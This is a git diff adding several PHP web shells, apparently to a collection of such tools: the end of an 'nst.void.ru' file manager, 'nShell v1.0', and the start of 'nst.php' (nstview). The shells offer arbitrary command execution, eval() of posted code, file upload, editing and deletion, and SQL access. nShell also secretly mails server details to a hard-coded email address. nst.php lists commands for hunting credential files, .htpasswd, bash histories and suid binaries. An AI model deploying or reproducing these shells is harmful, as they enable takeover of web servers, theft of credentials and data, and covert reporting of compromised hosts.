+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- Network security team :: nst.void.ru -->
\ No newline at end of file
diff --git a/php/nshell.php b/php/nshell.php
new file mode 100644
index 0000000..c5be33a
--- /dev/null
+++ b/php/nshell.php
@@ -0,0 +1,371 @@
+?»?<head>
+<title> nShell v1.0</title>
+<style>
+html { overflow-x: auto }
+A: {font-weight:bold};
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #444444;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+table {
+BORDER-RIGHT:  :#444444 1px outset;
+BORDER-TOP:    :#444444 1px outset;
+BORDER-LEFT:   :#444444 1px outset;
+BORDER-BOTTOM: :#444444 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    :#444444 1px solid;
+BORDER-LEFT:   :#444444 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+div,td,table {
+font-family:Georgia;
+}
+</style>
+</head>
+<body bgcolor=":#444444">
+<center>
+<?php
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+$myname=$_SERVER['SCRIPT_NAME'];
+echo "<b><font color=\"#000000\" size=\"3\" face=\"Georgia\"> System information: :</font><br>";             $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+<table width="80%" border="0">
+<td colspan="3" align="center">
+<?php
+function ex($comd)
+{
+ $res = '';
+if(function_exists("system"))
+	{
+	ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+	}elseif(function_exists("passthru"))
+	{
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+	}elseif(function_exists("exec"))
+	{
+    exec($comd,$res);
+    $res=implode("\n",$res);
+	}elseif(function_exists("shell_exec"))
+	{
+	$res=shell_exec($comd);
+	}elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+ }
+ return $res;
+}
+
+// safe mod
+$safe_mode=@ini_get('safe_mode');
+echo (($safe_mode)?("<div>Safe_mode: <b><font color=green>ON</font></b>"):("Safe_mode: <b><font color=red>OFF</font></b>"));
+echo "    ";
+// phpversion
+echo "Php version<font color=\"green\"> : ".@phpversion()."</font>";
+echo "    ";
+// curl
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "    ";
+// mysql
+echo "MYSQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// msssql
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// PostgreSQL
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// Oracle
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "    ";
+// Disable function
+echo "Disable functions : <b>";
+$df=@ini_get('disable_functions');
+if(!$df){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+echo "    ";
+//==============xac dinh os==================
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+if (ereg("Win32", $servsoft)){
+$sertype = "win";
+}
+else
+{
+$sertype = "nix";
+}
+//=========================================
+
+$uname=ex('uname -a');
+ echo "<br>OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+echo "<font color=\"black\"><a href=".$_SERVER['PHP_SELF']."?act=info target=_blank>Php Info</a></font><br></div>";
+
+?>
+</td><tr>
+<td width="20%" align="center"><a href="<?=$myname?>?act=manager"> File Manager</a></td>
+<td width="20%" align="center"><a href="<?=$myname?>?act=sql">Sql Query</a></td>
+<td width="20%" align="center"><a href="<?=$myname?>?act=eval">Eval()</a></td><tr>
+<td colspan="3" >
+<?php
+$act=@$_GET['act'];
+if($act=="info"){
+echo "<center><font color=red size=10> Php Version :".phpversion()."</font>";
+phpinfo();
+echo "</center>";
+}
+?>
+<?php
+//=========================================================
+function perms($mode)
+{
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+//===================Delect File=============================
+$del=$_GET['del'];
+function  delfile($name)
+{
+    passthru("del ".$name);
+}
+function deldir($name)
+{
+	passthru("rmdir ".$name);
+}
+if($del)
+{
+  if(is_file($del)) delfile($del); else deldir($del);
+}
+//==================Quan li thu muc ==========================
+if($act=="manager"){
+$arr = array();
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>";
+foreach ($arr as $filename) {
+if ($filename != "." and $filename != ".."){
+if (is_dir($filename) == true){
+$directory = "";
+$dc=str_replace("\\","",dirname($_SERVER['PHP_SELF']));
+$directory = $directory . "<tr><td align=center>$filename</td><td align=center>" .ucwords(filetype($filename)) . "</td><td></td><td align=center>" . perms(fileperms($filename))."<td align=center><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$dc.">Del</td>";
+$dires = $dires . $directory;
+}
+if (is_file($filename) == true){
+$file = "";
+$link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']);
+$file = $file . "<tr><td><a href=".$link	." target=_blank>$filename</a></td><td>" .ucwords(filetype($filename)). "</td><td>" . filesize($filename) . "</td><td>" . perms(fileperms($filename))."<td><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$filename.">Del <a href=".$_SERVER['PHP_SELF']."?act=manager&file=".$filename.">Edit</a></td>";
+$files = $files . $file;
+}
+}
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+}
+// view file ex: /etc/passwd
+if(isset($_REQUEST['file']))
+	{
+$file=@$_REQUEST["file"];
+echo "<b>File :</b><font color=red>   ". $file."</font>";
+$fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File");
+$src=@fread($fp,filesize($file));
+echo "<center><hr color=777777 width=100% height=115px><form action=".$_SERVER['REQUEST_URI']." method=post><TEXTAREA NAME=\"addtxt\" ROWS=\"5\" COLS=\"80\">".htmlspecialchars(stripslashes($src))."</TEXTAREA><br><input type=submit value=Save></form><hr color=777777 width=100% height=115px>";
+$addtxt=@$_POST["addtxt"];
+ rewind($fp);
+ if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt));
+ if($rs==true)
+ {
+ echo "Noi dung cua file nay da duoc sua doi !<a href=".$_SERVER['REQUEST_URI'].">Xem lai</a>";
+ }
+ ftruncate($fp,ftell($fp));
+echo "</center>";
+ }
+
+?>
+
+<?php
+// function
+function exe_u($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong update du lieu duoc !");
+if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^<br>";
+}
+function exe_c($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong Create duoc !");
+echo "This is Ok ! ^.^<br>" ;
+}
+function exe_d($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong Drop duoc  !");
+echo "This is Ok ! ^.^<br>" ;
+}
+function exe_w($query)
+{
+echo "<b><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong the show gi duoc het !");
+if(eregi("fields",$query)) {
+while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
+echo "<b><font color=red>".$row['Field']." :</font></	b> ".$row['Type'];
+echo "<br>";
+}
+} else {
+while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
+   while(list($key,$value)=each($row))
+{
+	echo "<font color=red><b>".$value."</b><font>";
+}
+echo "<br>";
+}
+}
+}
+function exe_s($query)
+{
+$arrstr=@array();$i=0;
+$arrstr=explode(" ",$query);
+$find_field=@mysql_query("show fiedls from ".$arrstr['4']);
+while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){
+$i++;
+$arrstr[$i]=$find_row['Field'];
+}
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong the select gi duoc het !");
+$row=@mysql_num_rows($result);
+}
+function sql($string)
+{
+$arr=@array();
+$arr=explode(";",$string);
+for($i=0;$i<=count($arr);$i++)
+	{
+	$check_u=eregi("update",@$arr[$i]); if($check_u==true)  exe_u(@$arr[$i]);
+	$check_e=eregi("use",@$arr[$i]); if($check_u==true)  exe_u(@$arr[$i]);
+	$check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]);
+	$check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]);
+	$check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]);
+    $check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]);
+	}
+}
+//=====xong phan function cho sql
+// Sql query
+if($act=="sql")
+{
+	 if(isset($_GET['srname'])&&isset($_GET['pass']))
+	{
+	 echo $_GET['srname'];
+if(!isset($_GET['srname'])) 	$servername=$_GET['srname'];
+   else $servername="localhost";
+$con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !");
+$form2="<center><form method=post  action=".$_SERVER['PHP_SELF']."><TEXTAREA NAME=\"str\" ROWS=\"2\" COLS=\"60\"></TEXTAREA><br><input type=submit name=s2 value=query></form></center>";
+echo $form2;
+$str=@$_POST['str'];
+if(isset($str)) sql($str);
+	}
+	else {
+		echo "chao";
+		$form1="<center><form method=GET action='".$_SERVER['PHP_SELF']."'><table width=100% boder=0><td width=100%> User Name : <input type=text name=uname size=20> Server Name :<input name=srname type=text  size=22></td><tr><td width=100%> Password :<input type=text name=pass size=20> Port : <input type=text name=port size=20><input type=submit value=login></form></td></form></table><hr color=777777 width=100% height=115px>";
+        echo $form1;
+             }
+}
+?>
+
+<?php
+if($act=="eval"){
+$script=$_POST['script'];
+if(!$script){
+echo "<hr color=777777 width=100% height=115px><form action=".$_SERVER['']." method=post><TEXTAREA NAME=\"\" ROWS=\"5\" COLS=\"60\"></TEXTAREA><input type=submit value=Enter></form><hr color=777777 width=100% height=115px>";
+}else{
+eval($script);
+}
+}
+?>
+</td>
+</table>
+
+<font face=Webdings size=6><b>!</b></font><b><font color=\"#000000\" size=\"3\" face=\"Georgia\">nShell v1.0. Code by Navaro.</font><br><b><font color="#000000" face="Georgia">Have Fun ! {^.^} { ~.~} </font></b>
+</center>
+</body>
+
+
+ 
diff --git a/php/nst.php b/php/nst.php
new file mode 100644
index 0000000..b69f8ed
--- /dev/null
+++ b/php/nst.php
@@ -0,0 +1,2137 @@
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+error_reporting(E_ALL & ~E_NOTICE);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
